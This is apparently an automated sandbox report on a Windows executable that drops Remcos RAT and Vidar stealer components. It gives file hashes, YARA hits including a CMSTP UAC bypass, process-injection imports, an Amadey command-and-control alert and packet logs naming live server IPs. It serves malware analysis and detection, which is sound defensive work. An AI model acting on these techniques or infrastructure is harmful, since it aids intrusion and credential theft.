Download File

Process:	C:\Users\user\Desktop\yaALNupJCH.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	962
Entropy (8bit):	5.0231167558795455
Encrypted:	false
SSDEEP:	12:tkbsYnd6UGkMyGWKyMPVGAD07f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkw750m9K:qbsodVauKyM8tvXhNlT3/7xcFWro
MD5:	25789CDADC88D2B1EB254FB69F1D7CD1
SHA1:	5B37BE0CB37815955D836AC070587D8453C309EA
SHA-256:	052360ECD79C967CEBF0037B08B75D07326EF110D502D344479B9849DDC7D7F8
SHA-512:	1C358B305B9978591CD5880A283906773E287D43062E13F0C44CFEE0C5FE5C3BDAB9640587EC808D364A2926A392A855537DDADFA86097300B428628332A6469
Malicious:	false
Reputation:	low
Preview:	{. "geoplugin_request":"154.16.192.235",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite data created by MaxMind, available from <a href='http:\/\/www.maxmind.com'>http:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7425",. "geoplugin_longitude":"-73.9877",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\svchost[1].exe

Download File

Process:	C:\Users\user\Desktop\yaALNupJCH.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	494080
Entropy (8bit):	6.594703017804104
Encrypted:	false
SSDEEP:	6144:Y/7iPrcL3ArwhBq7Kjsn9iHGXg0lwGS9MNNhdFvPxps9gsAOZZuAXec7N47ov:Y/uPq3AfK496Gw0lwGXN3pvs/Zuy48v
MD5:	8A214A5CD5C1E3249831BC1739F468CA
SHA1:	CEC69FE9CD31DFB468F5A1D49DFC8D9ADAFEBC2B
SHA-256:	739C8AB2E4107EE34EF9C92D4B355042DF3336661F7BE39C9D17199379397846
SHA-512:	FC05154ED0807E2BDE9CC5F9A131F907A897378749A8696602DE69945CF694DB001B4CD0319074F17E2A37EE58B1361130C9DD4C568A8E2A9F1521625B02EDE6
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\svchost[1].exe, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\svchost[1].exe, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\svchost[1].exe, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\svchost[1].exe, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\svchost[1].exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d..- ..~ ..~ ..~.f$~3..~.f&~...~.f'~>..~).Q~!..~.Z.~"..~....:..~.......~.......~).F~9..~ ..~...~....D..~..*~!..~....!..~Rich ..~........PE..L......d.................r..........=I............@.......................... ...........................................................H.......................;..@...8...........................x...@............................................text....p.......r.................. ..`.rdata...y.......z...v..............@..@.data...4]..........................@....tls.........p......................@....gfids..0...........................@..@.rsrc....H.......J..................@..@.reloc...;.......<...N..............@..B................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\svchost[1].dll

Download File

Process:	C:\Users\user\Desktop\yaALNupJCH.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	320000
Entropy (8bit):	6.6675963898287085
Encrypted:	false
SSDEEP:	6144:Asf1jvN8Q2xaWEbescwLR17I4eDuUQEIGk9ZRDNZMpShgaW:AgW2h1lwIGkJDNSp
MD5:	14F7F948561051323A5550BAB03B2515
SHA1:	D7C6FBFDBFD6C95037810DB1558A0DAB3FDD61FF
SHA-256:	34F29567CE5F19C9A4CC6752B1E7C6E56F04D4B4622E164181CBE7089B5543C4
SHA-512:	5C6DC6658E06140861304EC4A8DBB1DAAEE50C0C39699651BE5C684BC0E9F89819472449ABE59F0FC27CF0CF54A9788199B5EB2C5093C8440F9BAD8FE9BCF9BD
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\svchost[1].dll, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 52%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................8.z......\|......H.0...a.....q..........I.....y...........Rich...........................PE..L...Q..e...........!.....t...........i.......................................P............@.............................B...4...P................................B...................................M..@............................................text... s.......t.................. ..`.rdata...............x..............@..@.data...dR...........r..............@....reloc..TS.......T..................@..B........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000026011\svchost.dll

Download File

Process:	C:\Users\user\Desktop\yaALNupJCH.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	320000
Entropy (8bit):	6.6675963898287085
Encrypted:	false
SSDEEP:	6144:Asf1jvN8Q2xaWEbescwLR17I4eDuUQEIGk9ZRDNZMpShgaW:AgW2h1lwIGkJDNSp
MD5:	14F7F948561051323A5550BAB03B2515
SHA1:	D7C6FBFDBFD6C95037810DB1558A0DAB3FDD61FF
SHA-256:	34F29567CE5F19C9A4CC6752B1E7C6E56F04D4B4622E164181CBE7089B5543C4
SHA-512:	5C6DC6658E06140861304EC4A8DBB1DAAEE50C0C39699651BE5C684BC0E9F89819472449ABE59F0FC27CF0CF54A9788199B5EB2C5093C8440F9BAD8FE9BCF9BD
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: C:\Users\user\AppData\Local\Temp\1000026011\svchost.dll, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 52%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................8.z......\|......H.0...a.....q..........I.....y...........Rich...........................PE..L...Q..e...........!.....t...........i.......................................P............@.............................B...4...P................................B...................................M..@............................................text... s.......t.................. ..`.rdata...............x..............@..@.data...dR...........r..............@....reloc..TS.......T..................@..B........................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1572864
Entropy (8bit):	4.402184797918111
Encrypted:	false
SSDEEP:	12288:99pZG0ubj7ybGLGqoMK0UgAExAjeQGV1n1SYNnvRMkqGHrLTqqPGnj:PpZG0ubj7ybGLGLRj
MD5:	DEDFD4DFCE90F534F572C29910C395CA
SHA1:	4371FD53D7EEDFCD1FB3123489D4795FAE3181F0
SHA-256:	48EC02D5D3A0885F0E83498B31FA4FDB8AC5DA1793AB0728AB7244EC0A81795C
SHA-512:	7514334DBF257347F2055614C01C497B852321203FD1D12AF3540F688365F3B3C516729C9616BC5A60D11FCAE4C68B5B5625980E345668DEB12B22D99E737658
Malicious:	false
Reputation:	low
Preview:	regf........p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve.LOG1

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	3.2185021074325637
Encrypted:	false
SSDEEP:	768:YmZHaiLRftdgFfiYW9zoe0eqniPTDv6BHF7meaEKJ:HFLJpZokPUmi
MD5:	8039252697DB910E6EF4D0BB7ED62B9F
SHA1:	514B944CA2EA2C881172858673464F1BE8C9D537
SHA-256:	F4603780AAFA437D6ECBEEFA294D3585A8532223F823CFB36B734C587F307242
SHA-512:	49FFF434A1A45CEDE0ED72D24C9B60B70E2A0C0E255FBAFD5B1CD9E37346E82FFA6D7141069FD99E7829AC658069085F4DF222EADF946D63695B0C37554ED6D2
Malicious:	false
Reputation:	low
Preview:	regf........p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm.......................................................................................................................................................................................................................................................................................................................................................HvLE.^.......................q..zj..............@.......`........... ..hbin................p.\..,..........nk,.\|.9N........P........................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk .\|.9N........ ........................... .......Z.......................Root........lf......Root....nk .........................}.............. ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck...

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.439668295542863
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	yaALNupJCH.exe
File size:	224'256 bytes
MD5:	b2ee13e6988e57f6731c20da3459c8dc
SHA1:	3be7be70961a381c48d35ba7d37add07a3e477a3
SHA256:	6cb42cc70376a4ba12627c2f6755d4235beffe85a6600dc91ffd7c22cb61df96
SHA512:	792fb3ab1a5bff04602a575e94d4db9c2762dd98790a620ec6ecea9ba5a24ac61f6f84bafbf12e69581460d57ac4b49d31b4ba44653248ca6d1de0ada7a5ce42
SSDEEP:	6144:dg2q9k0PPBFFRTvPcHb13OIX37ROpCvFc0u+VDVn67JS9K8:p6BvP613OIH7RlFhu+VDx7K8
TLSH:	3C2419513952C072D560A1B619F5BFF2C19DA819ABB049EFAB804F77CA112F33D21E39
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]..M.o...o...o..B....o..B....o..B....o.......o.......o......5o..B....o...o...o.......o....m..o.......o..Rich.o.................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x412af1
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x5C93143B [Thu Mar 21 04:34:03 2019 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	3865972614d44e518713c9a6183fed14

Entrypoint Preview

Instruction
call 00007FA614841E97h
jmp 00007FA614841889h
jmp 00007FA614845CFFh
push ebp
mov ebp, esp
sub esp, 00000324h
push ebx
push 00000017h
call 00007FA6148549D7h
test eax, eax
je 00007FA614841A17h
mov ecx, dword ptr [ebp+08h]
int 29h
push 00000003h
call 00007FA614841BBBh
mov dword ptr [esp], 000002CCh
lea eax, dword ptr [ebp-00000324h]
push 00000000h
push eax
call 00007FA61484248Fh
add esp, 0Ch
mov dword ptr [ebp-00000274h], eax
mov dword ptr [ebp-00000278h], ecx
mov dword ptr [ebp-0000027Ch], edx
mov dword ptr [ebp-00000280h], ebx
mov dword ptr [ebp-00000284h], esi
mov dword ptr [ebp-00000288h], edi
mov word ptr [ebp-0000025Ch], ss
mov word ptr [ebp-00000268h], cs
mov word ptr [ebp-0000028Ch], ds
mov word ptr [ebp-00000290h], es
mov word ptr [ebp-00000294h], fs
mov word ptr [ebp-00000298h], gs
pushfd
pop dword ptr [ebp-00000264h]
mov eax, dword ptr [ebp+04h]
mov dword ptr [ebp-0000026Ch], eax
lea eax, dword ptr [ebp+04h]
mov dword ptr [ebp-00000260h], eax
mov dword ptr [ebp-00000324h], 00010001h
mov eax, dword ptr [eax-04h]
push 00000050h
mov dword ptr [ebp-00000270h], eax
lea eax, dword ptr [ebp-58h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x31c38	0x64	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x36000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x37000	0x20ec	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x30ec0	0x70	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x30fd4	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x30f30	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2a000	0x204	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x28a8d	0x28c00	False	0.46966665069018404	data	6.484521845042752	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x2a000	0x87e2	0x8800	False	0.47403492647058826	data	5.326563862346545	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x33000	0x24c0	0x1800	False	0.08658854166666667	data	1.372411159115681	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x36000	0x1e0	0x200	False	0.52734375	data	4.7137725829467545	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x37000	0x20ec	0x2200	False	0.7629825367647058	data	6.529600973386202	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
uvhg	0x3a000	0x2000	0x1800	False	0.4466145833333333	data	5.128141149205521	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x36060	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
KERNEL32.dll	CreateFileA, CloseHandle, GetSystemInfo, CreateThread, GetThreadContext, GetProcAddress, VirtualAllocEx, RemoveDirectoryA, GetFileAttributesA, CreateProcessA, CreateDirectoryA, SetThreadContext, WriteConsoleW, ReadConsoleW, SetEndOfFile, HeapReAlloc, HeapSize, GetLastError, CopyFileA, GetTempPathA, Sleep, GetModuleHandleA, SetCurrentDirectoryA, ResumeThread, GetComputerNameExW, GetVersionExW, CreateMutexA, VirtualAlloc, WriteFile, VirtualFree, WriteProcessMemory, GetModuleFileNameA, ReadProcessMemory, ReadFile, SetFilePointerEx, GetTimeZoneInformation, GetConsoleMode, GetConsoleCP, FlushFileBuffers, GetStringTypeW, GetProcessHeap, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, WideCharToMultiByte, GetCPInfo, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, FindClose, SetStdHandle, GetFullPathNameW, GetCurrentDirectoryW, DeleteFileW, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, SetEvent, ResetEvent, WaitForSingleObjectEx, CreateEventW, GetModuleHandleW, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, GetCurrentProcess, TerminateProcess, RaiseException, SetLastError, RtlUnwind, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, ExitProcess, GetModuleHandleExW, CreateFileW, GetDriveTypeW, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, GetModuleFileNameW, GetStdHandle, GetCommandLineA, GetCommandLineW, HeapFree, HeapAlloc, MultiByteToWideChar, CompareStringW, LCMapStringW, DecodePointer
ADVAPI32.dll	RegCloseKey, RegQueryValueExA, GetSidSubAuthorityCount, GetSidSubAuthority, GetUserNameA, LookupAccountNameA, RegSetValueExA, RegOpenKeyExA, GetSidIdentifierAuthority
SHELL32.dll	ShellExecuteA, SHGetFolderPathA
WININET.dll	HttpOpenRequestA, InternetReadFile, InternetConnectA, HttpSendRequestA, InternetCloseHandle, InternetOpenA, InternetOpenW, InternetOpenUrlA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.395.141.41.1249794802027700 09/28/23-06:01:52.097963	TCP	2027700	ET TROJAN Amadey CnC Check-In	49794	80	192.168.2.3	95.141.41.12

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 28, 2023 06:01:51.903630018 CEST	49794	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:01:52.097353935 CEST	80	49794	95.141.41.12	192.168.2.3
Sep 28, 2023 06:01:52.097569942 CEST	49794	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:01:52.097963095 CEST	49794	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:01:52.296478987 CEST	80	49794	95.141.41.12	192.168.2.3
Sep 28, 2023 06:01:52.305059910 CEST	80	49794	95.141.41.12	192.168.2.3
Sep 28, 2023 06:01:52.305138111 CEST	49794	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:01:52.634113073 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:52.814528942 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:52.814690113 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:52.814924002 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:52.995318890 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:52.995371103 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:52.995420933 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:52.995423079 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:52.995460987 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:52.995513916 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:52.995546103 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:52.995553017 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:52.995583057 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:52.995605946 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:52.995639086 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:52.995661974 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:52.995695114 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:52.995717049 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:52.995749950 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:52.995800018 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:52.995835066 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:52.995857000 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:52.995870113 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:52.995913982 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:52.995913982 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:53.176090002 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.176110983 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.176130056 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.176146984 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.176166058 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.176171064 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:53.176186085 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.176189899 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:53.176204920 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.176223040 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.176233053 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:53.176253080 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:53.176269054 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.176273108 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:53.176312923 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:53.176371098 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.176412106 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:53.176500082 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.176537991 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:53.176623106 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.176667929 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:53.176692009 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.176706076 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.176738024 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:53.176740885 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.176757097 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:53.176778078 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.176789045 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:53.176815033 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.176825047 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:53.176836014 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.176862955 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:53.176873922 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:53.176888943 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.176925898 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:53.176969051 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.177004099 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:53.356770992 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.356808901 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.356822014 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.356838942 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.356872082 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.356873035 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:53.356909990 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:53.356964111 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.356992960 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:53.357011080 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.357038975 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:53.357088089 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.357116938 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:53.357156038 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.357188940 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:53.357208967 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.357237101 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:53.357300997 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.357330084 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:53.357397079 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.357434034 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:53.357492924 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.357507944 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.357522964 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:53.357527971 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.357542992 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:53.357546091 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.357566118 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:53.357588053 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:53.357634068 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.357666969 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:53.357676983 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.357705116 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:53.357789993 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.357817888 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:53.357875109 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.357903004 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:53.357913017 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.357939959 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:53.357988119 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.358021021 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:53.358025074 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.358059883 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:53.358103037 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.358135939 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:53.358179092 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.358220100 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:53.358247995 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.358290911 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:53.358334064 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:53.358372927 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:53.358388901 CEST	80	49796	157.90.36.211	192.168.2.3
